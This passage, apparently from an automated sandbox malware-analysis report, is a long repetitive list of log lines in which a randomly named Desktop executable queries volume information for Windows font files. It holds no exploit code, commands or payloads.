            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
